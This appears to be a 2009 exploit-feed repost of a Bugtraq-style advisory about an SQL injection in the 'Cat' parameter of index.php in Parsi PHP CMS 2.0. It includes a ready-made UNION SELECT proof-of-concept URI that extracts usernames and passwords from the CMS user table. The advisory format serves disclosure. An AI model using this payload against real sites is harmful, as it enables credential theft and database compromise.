|
Feeds -
Exploits
|
|
Written by Cru3l.b0y
|
|
Thursday, 26 February 2009 22:32 |
Parsi PHP CMS 'index.php' SQL Injection Vulnerability
-\\Bugtraq ID: 33914
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Feb 26 2009 12:00AM
-\\Updated: Feb 26 2009 07:37PM
-\\Credit: Cru3l.b0y
-\\Vulnerable: Sasan Nobakht Parsi PHP CMS 2.0
-\\Discussion Parsi PHP CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Parsi PHP CMS 2.0.0 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s): Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/[p4th]/index.php?Cat=-9999'+union+select+1,2,3,concat(user_username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+parsiphp_u ser/*
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s) --Parsi PHP CMS Homepage http://www.parsiphp.com (Sasan Nobakht)
|